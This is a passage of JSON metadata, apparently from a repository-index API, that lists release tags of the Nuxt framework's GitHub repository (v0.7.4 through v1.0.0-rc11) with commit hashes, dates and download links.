ts"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"c